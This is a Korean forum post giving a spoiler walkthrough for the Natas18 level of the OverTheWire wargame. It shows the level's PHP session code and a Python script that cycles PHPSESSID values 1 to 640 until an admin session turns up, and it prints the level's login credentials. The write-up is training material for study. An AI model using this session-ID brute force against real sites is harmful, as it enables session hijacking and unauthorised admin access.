노루발 공작소 - (스포일러) Natas18 풀이

노루발의 개인 게시판

글 수 34

(스포일러) Natas18 풀이

노루발

로그인창이 있고, admin 계정으로 로그인해야 한다. 소스를 보자:

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
    session_id(createID($_REQUEST["username"]));
    session_start();
    $_SESSION["admin"] = isValidAdminLogin();
    debug("New session started");
    $showform = false;
    print_credentials();
    }
}

각 유저마다 Session ID를 부여해주는것 같다.

$maxid = 640; // 640 should be enough for everyone

Session ID의 최대 값은 640인것 같다.

로그인 후의 쿠키에는 PHPSESSID=34 형태로 Session ID가 저장되어 있다.

따라서 1~640 사이의 임의의 값에 admin 계정의 Session ID가 존재하지 않을까?

순차적으로 탐색하는 Python 코드를 작성하였다.

import requests

session = 1

for a in range(36, 640) :
    cookie = {'PHPSESSID': str(a)}
    r = requests.post('http://natas18.natas.labs.overthewire.org/index.php', auth=('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'), cookies = cookie)
    print("Trying session no: " + str(a))
    if "You are an admin" in r.text:
        print("******** FOUND IT******** ")
        print(r.text)
        break

위의 코드를 사용하여 Natas19의 패스워드를 알아낼 수 있었다.

이 게시물을

분류 :: 망한거

조회 수 :: 9
등록일 :: 2020.03.12; 22:52:01 (*.47.15.90)

엮인글 :

게시글 주소 :: https://hondoom.com/zbxe/index.php?mid=noru&document_srl=818127

파일 첨부

여기에 파일을 끌어 놓거나 파일 첨부 버튼을 클릭하세요.

파일 크기 제한 : 0MB (허용 확장자 : *.*)

0개 첨부 됨 ( / )

옵션 :: 비밀글 기능

글쓴이 :

비밀번호 :

List of Articles

번호	제목	글쓴이	날짜	조회 수
34	망한거 (스포일러) Natas24 풀이	노루발	2020-03-19	48
33	망한거 (스포일러) Natas24 풀이	노루발	2020-03-17	19
32	망한거 (스포일러) Natas23 풀이	노루발	2020-03-13	16
31	망한거 (스포일러) Natas22 풀이	노루발	2020-03-13	10
30	망한거 (스포일러) Natas21 풀이	노루발	2020-03-13	13
29	망한거 (스포일러) Natas20 풀이	노루발	2020-03-13	16
28	망한거 (스포일러) Natas19 풀이	노루발	2020-03-13	14
»	망한거 (스포일러) Natas18 풀이	노루발	2020-03-12	9
26	망한거 (스포일러) Natas17 풀이	노루발	2020-03-12	16
25	망한거 (스포일러) Natas16 풀이	노루발	2020-03-12	18
24	망한거 (스포일러) Natas15 풀이	노루발	2020-03-11	21
23	망한거 (스포일러) Natas14 풀이	노루발	2020-03-10	12
22	망한거 (스포일러) Natas13 풀이	노루발	2020-03-10	7
21	망한거 (스포일러) Natas12 풀이	노루발	2020-03-08	15
20	망한거 (스포일러) Natas11 풀이	노루발	2020-03-07	19
19	망한거 (스포일러) Natas10 풀이	노루발	2020-03-07	13
18	망한거 (스포일러) Natas9 풀이	노루발	2020-03-06	11
17	망한거 (스포일러) Natas8 풀이	노루발	2020-03-06	8
16	망한거 (스포일러) Natas7 풀이	노루발	2020-03-06	10
15	망한거 (스포일러) Natas6 풀이	노루발	2020-03-06	9

쓰기

첫 페이지 1 2 끝 페이지